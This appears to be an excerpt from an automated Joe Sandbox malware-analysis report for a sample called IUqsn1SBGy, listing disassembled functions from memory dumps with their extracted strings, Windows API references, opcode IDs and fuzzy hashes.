Instruction Fuzzy Hash: 1691F231A04256DFDB55DF68C84496EFBF2FF8A600F18869AF405AB261C771AC05CB92

Function 01770B33 Relevance: 4.0, Strings: 3, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: c0fffc42236443aec86867c3567dccd17f0b5e4fe747466e0567ccc11eb896ec
Instruction ID: 3e6ab99346a55d441183f347044edc06fb0f8d4fbf0270223c259191f82e0c5e
Opcode Fuzzy Hash: c0fffc42236443aec86867c3567dccd17f0b5e4fe747466e0567ccc11eb896ec
Instruction Fuzzy Hash: 04810131A042569FCF59DF68C84496EFBF2FF8A600F18869AF005EB261C7719D05CB92

Function 01770ADD Relevance: 4.0, Strings: 3, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: ecb65c444976b43e8074f19e7eeb3782ea038dca3934e73cd51a7f0584db73d1
Instruction ID: 74579b8e5a03b418a583dbdceea105c5ce09eaca3f51cce75d64daf3ed6cab41
Opcode Fuzzy Hash: ecb65c444976b43e8074f19e7eeb3782ea038dca3934e73cd51a7f0584db73d1
Instruction Fuzzy Hash: 3F811131A042569FCB59DF68C8449AEFBF2FF8A600F18859AF405EB261C7719D05CB92

Function 01770C95 Relevance: 4.0, Strings: 3, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: 76d376f47dd8ad1bc9236486f58ddb4cc5a2cc00e158e743490d3b693e68a263
Instruction ID: c9e699d9b18369c9f466f9d460120bbce4974174ae59588114f6948dc7ba238f
Opcode Fuzzy Hash: 76d376f47dd8ad1bc9236486f58ddb4cc5a2cc00e158e743490d3b693e68a263
Instruction Fuzzy Hash: D4811531A042569FCF59DF68C85056EFBB2FF8A700F28869AF406EB351C6719D05CB92

Function 01770960 Relevance: 4.0, Strings: 3, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: b6ca30da1c652d1fe14064228e4a970588bdf64828750f870aaf24b6fdf8ed1e
Instruction ID: 2bdc79bbef81060969c207a2cfc0c32461d68240f9f2d2ebc094dd10bfb0ab57
Opcode Fuzzy Hash: b6ca30da1c652d1fe14064228e4a970588bdf64828750f870aaf24b6fdf8ed1e
Instruction Fuzzy Hash: 92812231A042569FDF59DF68C84056EFBB2FF8A700F18859AF006EB2A1C6719D04CB92

Function 01770DFC Relevance: 4.0, Strings: 3, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: 97afd06b99430164ad0d37108e1525fe65e9b9db2521646cbe9ac4f90ddf0a4a
Instruction ID: 6222d6b05e6bd4d517ea6388ff99ba715efe1f6e40c9290451f6b78693ce8956
Opcode Fuzzy Hash: 97afd06b99430164ad0d37108e1525fe65e9b9db2521646cbe9ac4f90ddf0a4a
Instruction Fuzzy Hash: F5816731A042529FCF49DF68884466EFBB2FF8B700F18859AF406EB261C7719D05CB92

Function 09E30B78 Relevance: 4.0, Strings: 3, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 09E30BF9
Te]q, xrefs: 09E30E00
z^I, xrefs: 09E30D51

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: Te]q$Te]q$z^I
API String ID: 0-3923789156
Opcode ID: 50f5ea576b25bdec815c8d372a557b8c00f75dfcc922942ce862be00b6143e14
Instruction ID: 4de5b16f9903c1c36a10cd10650983da7263da866ebd50d799e24038dc12da3a
Opcode Fuzzy Hash: 50f5ea576b25bdec815c8d372a557b8c00f75dfcc922942ce862be00b6143e14
Instruction Fuzzy Hash: 60A10374E042598FCB08CFAAC9846DEFBB2FF89310F24942AD416BB264D7359946CF54

Function 01770D97 Relevance: 4.0, Strings: 3, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: d0d2fa0f6a435ee85a77a56150c34fc89aac83241130fd1261299a162b10e1e5
Instruction ID: 31b33bea633b6a470bf6b2c9a41492d5f02d3c0475cda76fd0de8e7978c2c80d
Opcode Fuzzy Hash: d0d2fa0f6a435ee85a77a56150c34fc89aac83241130fd1261299a162b10e1e5
Instruction Fuzzy Hash: 83810131A042569FDF59DF68C844A6EFBF2FF8A600F18859AF005EB261C7719D05CB92

Function 01770D40 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: 2e59ef20cb67f9652cdf24faece5c61b3c61c5a76cdca050643d57a87a0e14ce
Instruction ID: 96ff19fb2e6c949b841630102a1c2e8ca88fab728f56e48dbb953164d8bd2a53
Opcode Fuzzy Hash: 2e59ef20cb67f9652cdf24faece5c61b3c61c5a76cdca050643d57a87a0e14ce
Instruction Fuzzy Hash: 0E812331A042569FCF59DF68C84496EFBB2FF8A700F28859AF406EB351C6719D05CB92

Function 01770B9E Relevance: 4.0, Strings: 3, Instructions: 220COMMON

Download Yara Rule

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: 47755b5f955c2aa26752db16b0ea57c3815894f1abdd584cce5333e4784b5eeb
Instruction ID: f94210dfc7eb6a4d8a5adac3979519c88e7953db7b841520759800693c38a6da
Opcode Fuzzy Hash: 47755b5f955c2aa26752db16b0ea57c3815894f1abdd584cce5333e4784b5eeb
Instruction Fuzzy Hash: 36812131A042569FCF59DF68C84496EFBF2FF8B600F18859AF006EB261C6719D05CB92

Function 01770AAA Relevance: 4.0, Strings: 3, Instructions: 220COMMON

Download Yara Rule

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: e6ae3f67d0ed0f3f1d08e2035196209d82524f06fbb72a6b419b70deb4e8aada
Instruction ID: ce5f06349895f96c3618a3fa475f49f0daa7ca3f8958fb091875df150c5d6155
Opcode Fuzzy Hash: e6ae3f67d0ed0f3f1d08e2035196209d82524f06fbb72a6b419b70deb4e8aada
Instruction Fuzzy Hash: E8812231A082569FDF59DF68C84496EFBF2FF8A700F18859AF005EB261C6719D05CB92

Function 01770C15 Relevance: 4.0, Strings: 3, Instructions: 220COMMON

Download Yara Rule

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: e83a24cd9e44c50cfdea57cc1f1957a5207e35a27de828acd290e2f8dcef935a
Instruction ID: 1ab8a619c439b296b49ac55b000c7c0e779e6a8c37619ec9331a23e0bb698f26
Opcode Fuzzy Hash: e83a24cd9e44c50cfdea57cc1f1957a5207e35a27de828acd290e2f8dcef935a
Instruction Fuzzy Hash: 9F813331A042569FDF59DF68C84456EFBF2FF8B600F18859AF006EB261C6719D05CB92

Function 01770D14 Relevance: 4.0, Strings: 3, Instructions: 219COMMON

Download Yara Rule

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: e92e9db81372782680b9fcc63d9a68fe37fdd736ef499c569217cb7fd9b77560
Instruction ID: e009cb9143221abd12b85041aced4b7d858a1ba608b3d11f883ca4d0d577fae3
Opcode Fuzzy Hash: e92e9db81372782680b9fcc63d9a68fe37fdd736ef499c569217cb7fd9b77560
Instruction Fuzzy Hash: 4D813531A042569FDF59DF68C84056EFBF2FF8A700F28859AF006EB261C6719D05CB92

Function 09E30B90 Relevance: 4.0, Strings: 3, Instructions: 219COMMON

Download Yara Rule

Strings

Te]q, xrefs: 09E30BF9
Te]q, xrefs: 09E30E00
z^I, xrefs: 09E30D51

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: Te]q$Te]q$z^I
API String ID: 0-3923789156
Opcode ID: c0d3a8e715a410a453eb21d0a4bf7c514a37dee0d4f7e96c8ce6a87849a1fe5c
Instruction ID: 49bb05a9382b859799022f323d305ab6d77cd2617895060faf2d40d46fcaa21f
Opcode Fuzzy Hash: c0d3a8e715a410a453eb21d0a4bf7c514a37dee0d4f7e96c8ce6a87849a1fe5c
Instruction Fuzzy Hash: 7791B274E052198FCB08CFAAC584ADDFBB2FF88310F24942AD516BB264D7359946CF54

Function 01770C5D Relevance: 4.0, Strings: 3, Instructions: 218COMMON

Download Yara Rule

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: db586b54dc74a65817a2029fe2d6c3815ebedcadf587df9ca4f7eb972ef4851f
Instruction ID: dbd81ec19cc8d6a5744787d6ce6b76b8b80e02d9a1257f24aeaf2b45369a3a64
Opcode Fuzzy Hash: db586b54dc74a65817a2029fe2d6c3815ebedcadf587df9ca4f7eb972ef4851f
Instruction Fuzzy Hash: 36813531A042569FCF59DF68C85056EFBF2FF8A700F28859AF406EB261C6719D05CB92

Function 01770BE1 Relevance: 4.0, Strings: 3, Instructions: 216COMMON

Download Yara Rule

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: e51149dbb9485337ed9882ba141de8d2c5233dc696e1bea08d234a941248d9e5
Instruction ID: c91bb1fc8f2a35e889a9fcacaffbd02ff39053d2dc2a65a5e211382ba24fe985
Opcode Fuzzy Hash: e51149dbb9485337ed9882ba141de8d2c5233dc696e1bea08d234a941248d9e5
Instruction Fuzzy Hash: A0712331A042569FDF59DF68C84456EFBF2FF8A700F28859AF006EB261C6719D05CB92

Function 01770E7B Relevance: 4.0, Strings: 3, Instructions: 208COMMON

Download Yara Rule

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: 086f06c672c7c2f4d25b996d26215fe5647388f3333996817d67fa896930b938
Instruction ID: ddee54bd86eb95e9dd6cee86d173037d6bba4ea351d67ed032b7d6205aab081f
Opcode Fuzzy Hash: 086f06c672c7c2f4d25b996d26215fe5647388f3333996817d67fa896930b938
Instruction Fuzzy Hash: 4B714631A042569FDF49DF68884056EFBF2FF8A700F18859AF006EB361C6719D05CB92

Function 01770F68 Relevance: 3.9, Strings: 3, Instructions: 130COMMON

Download Yara Rule

Strings

Te]q, xrefs: 01770F85
MJS, xrefs: 01770FFB
Te]q, xrefs: 017710D2

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: MJS$Te]q$Te]q
API String ID: 0-1407380276
Opcode ID: bcc05c6c71ba43b2bec6bce8b89c31bb94a210d3886ffb910a50eb9fdc2fa4cd
Instruction ID: 6cf1bdcfa4c6bd5dcaf5f0fe96b3c33043ad3a71665dda3fb0c3ba8caf26fff5
Opcode Fuzzy Hash: bcc05c6c71ba43b2bec6bce8b89c31bb94a210d3886ffb910a50eb9fdc2fa4cd
Instruction Fuzzy Hash: 0D41C131B101198FDF48DFA8C9556BEF7F6BBC9600F21846AE502EB3A4CA319D05CB91

Function 09E39589 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

UC;", xrefs: 09E39786
TuA, xrefs: 09E39708

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: TuA$UC;"
API String ID: 0-2071649361
Opcode ID: d11c45cbde787e76e4106c555ad58df97061541d8744cd6a7737958c8ada392c
Instruction ID: 56857e399ef0b6a0edfe12ce56af66549c20d64d23f707cf43e2ef7c49f7ee1a
Opcode Fuzzy Hash: d11c45cbde787e76e4106c555ad58df97061541d8744cd6a7737958c8ada392c
Instruction Fuzzy Hash: 45A12771D05209EFCB08CFAAD5845EEFBB2EF89350F50E42AE416AB264D7709942CF50

Function 0A562106 Relevance: 1.8, Strings: 1, Instructions: 561COMMON

Download Yara Rule

Strings

D, xrefs: 0A56210B

Memory Dump Source

Source File: 00000000.00000002.2129631396.000000000A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a560000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 362c9f8df94785ff9a9a9e6d5474dde9d517d1ea3c46b40a09b7b343b4d86f2a
Instruction ID: 5a6452fc5af3b111940308eb1203733046a60254c400a3a9566b61f2deab42c7
Opcode Fuzzy Hash: 362c9f8df94785ff9a9a9e6d5474dde9d517d1ea3c46b40a09b7b343b4d86f2a
Instruction Fuzzy Hash: 2652DA74A012298FCB65DF68D898ADDB7B6FF89300F1085D9D509A7365CB349E81CF90

Function 09E37F60 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

5=6, xrefs: 09E3809E

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: 5=6
API String ID: 0-2897083178
Opcode ID: 6913bd5830593268a7763663d50d7f79ae3396741cf5ebb66cd3d3a1f182e63e
Instruction ID: 8ebd0b7579097e066b00126d8eb5d60250ae6ead48a439e292faeba936d7f5e8
Opcode Fuzzy Hash: 6913bd5830593268a7763663d50d7f79ae3396741cf5ebb66cd3d3a1f182e63e
Instruction Fuzzy Hash: A3711374E0521ADFCB08CFA6D8446AEFBF2BF89341F11E42A9416E7264D7349A01CF65

Function 09E31440 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

-2m, xrefs: 09E31563

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: -2m
API String ID: 0-2686427999
Opcode ID: bc86993897fc2b0917ce26887ff3f3295b03ace8f08379c079b14351db336489
Instruction ID: a98c33f0d5d5e30ff8ea288e35df36a16068195e48b77c3be18ca784a2691ff4
Opcode Fuzzy Hash: bc86993897fc2b0917ce26887ff3f3295b03ace8f08379c079b14351db336489
Instruction Fuzzy Hash: C75139B0D052199FCB08CFAAC4446EEFBF2EF88341F64E06AD41AA7255D7349A41CB65

Function 0A56ACD5 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129631396.000000000A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a560000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee31e574d5ed4ddbe85f245477721840d61735e9bd8156edf772241313cc738
Instruction ID: 8cb9e47502079446213e1924163e75146640dcb7c3492787aed0c3c39be0ef6f
Opcode Fuzzy Hash: 5ee31e574d5ed4ddbe85f245477721840d61735e9bd8156edf772241313cc738
Instruction Fuzzy Hash: 3BC19C71E002599FCF25CFA9C880799BBB1BF89310F14C5AAD489AB255EB34D985CF50

Function 0A56C158 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129631396.000000000A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a560000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa912d46ea75a3888cb837d4975948b72115d9aea5bed2d2f1029106ac995c9
Instruction ID: 99113021850306e923b4d83276f2d543d2f9c888f636c49786a67274283d62ef
Opcode Fuzzy Hash: baa912d46ea75a3888cb837d4975948b72115d9aea5bed2d2f1029106ac995c9
Instruction Fuzzy Hash: ABC15A71E002199FCF25CFA9D880799BBB2BF88300F14C5AAD449AB255EB34E985CF50

Function 09E33488 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ad9de58b9f7d382768d4b6d1a677f661177756769f9c89fc4480f3c375f00db
Instruction ID: 5ce576f9fd42203ca63e62095791555e1e9258b85546dcf6e3814b00dcccb701
Opcode Fuzzy Hash: 9ad9de58b9f7d382768d4b6d1a677f661177756769f9c89fc4480f3c375f00db
Instruction Fuzzy Hash: 4B51C274E11209DFCB44CFA9D5849AEBBF2BB88320F54E5A6D819A7324D730DA41CB91

Function 09E332A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce0c245fee60fa39907cb88f6477bbf63707916d0793d3147fca1d82ea2d4112
Instruction ID: 6f6f99d75ca7aac1f99b0a675dd7bb062ba72916bf3ac7273fe37c826e244902
Opcode Fuzzy Hash: ce0c245fee60fa39907cb88f6477bbf63707916d0793d3147fca1d82ea2d4112
Instruction Fuzzy Hash: A8512574E0520ADFCB44CFAAD9449AEFBF1AF89340FA4E1AAD415E7224D3349A41CF51

Function 09E333B8 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61d2515002c515e40b09182133ab34e9cada90a2ac16d3f88ae026751e493505
Instruction ID: 32df9908d7fdc9fb9e62d3d86871b8d56dad6e69270ca93a63b5c00d518b334e
Opcode Fuzzy Hash: 61d2515002c515e40b09182133ab34e9cada90a2ac16d3f88ae026751e493505
Instruction Fuzzy Hash: D4412974E01209EFCB48CFA9C58499DFBF2EF89340F64E5AAD415A7225D7309A11CB01

Function 09E31E78 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 192659db29c5667a4152293b1026bbb6537f48739c840ae6fea1f6952dcabccb
Instruction ID: 916337e775db5ff296e2e0c4a681e1c5ef7e619400b9f749ffab08b62eff7ba3
Opcode Fuzzy Hash: 192659db29c5667a4152293b1026bbb6537f48739c840ae6fea1f6952dcabccb
Instruction Fuzzy Hash: 7E313771E016588BDB18CFABD8446CEBBB3EFC9310F14C06AD409AA268DB355A46CF51

Function 09FC3D40 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09FC3F76

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8fbcb2e4d8a670e4df71b2976255a5723e8011091f28973245e48f032f8e3bcb
Instruction ID: d8a048b2a08119812d607cb36ae95b021c99e8727b2642f04ad6a8a8c40f9525
Opcode Fuzzy Hash: 8fbcb2e4d8a670e4df71b2976255a5723e8011091f28973245e48f032f8e3bcb
Instruction Fuzzy Hash: E7916AB1D0021ACFDB24CFA8C9517EDBBB2BF48314F14C169E809A7290DB759985CF91

Function 09FC3D3F Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09FC3F76

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a833a69b03805d29a1b9cd82b17e80c605951cc66be5490ec76e15cc0ba73c3a
Instruction ID: 856f080b4a4c46687e1837824b21b73bb39a99039d0c8e1feaeb38be7055dcfe
Opcode Fuzzy Hash: a833a69b03805d29a1b9cd82b17e80c605951cc66be5490ec76e15cc0ba73c3a
Instruction Fuzzy Hash: E3915AB1D0021ACFDB24CFA8C9517EDBBB2BF48314F14C56AE809A7290DB759985CF91

Function 01778CF5 Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01778DB1

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7c5e13f1ecd5e1393df7f0b75eab0872f6241afa1c693931120324d5d4571103
Instruction ID: 6f6c1632ebae4776faffa498121ff3cb10424c50db13d411a7848abb71f4a810
Opcode Fuzzy Hash: 7c5e13f1ecd5e1393df7f0b75eab0872f6241afa1c693931120324d5d4571103
Instruction Fuzzy Hash: D851F1B1C00619CEDB24CFAAC8487DDFBF5BF48304F24846AD518AB250D7756946CF91

Function 01777804 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01778DB1

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e2280320a1a52d08caed7529923a7a8cf9722d66d5a5ab15a3c30c4ff5aa3ae3
Instruction ID: 30de8bce2c4dfa07126b577dfffbce494b8f8063f58e7c2ddb5690c389534894
Opcode Fuzzy Hash: e2280320a1a52d08caed7529923a7a8cf9722d66d5a5ab15a3c30c4ff5aa3ae3
Instruction Fuzzy Hash: AE41E0B0C00619CBDB24CFAAC848BDDFBF5BF48304F24846AD418AB254DBB56946CF91

Function 0A56CA90 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129631396.000000000A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a560000_IUqsn1SBGy.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 5e0d9d3b7af8c12a154694e389e3b75db8d24a66f8ef76f2383d1538cef9a525
Instruction ID: cec7e376b1cbfd603d54c0596075c4bda3009cbc86d1143142b2b19f89783016
Opcode Fuzzy Hash: 5e0d9d3b7af8c12a154694e389e3b75db8d24a66f8ef76f2383d1538cef9a525
Instruction Fuzzy Hash: 4F315A729003899FCB11CFA9C844AEEBFF5FF49310F18805AE954AB261C3399955DFA1

Function 09FC3AB1 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

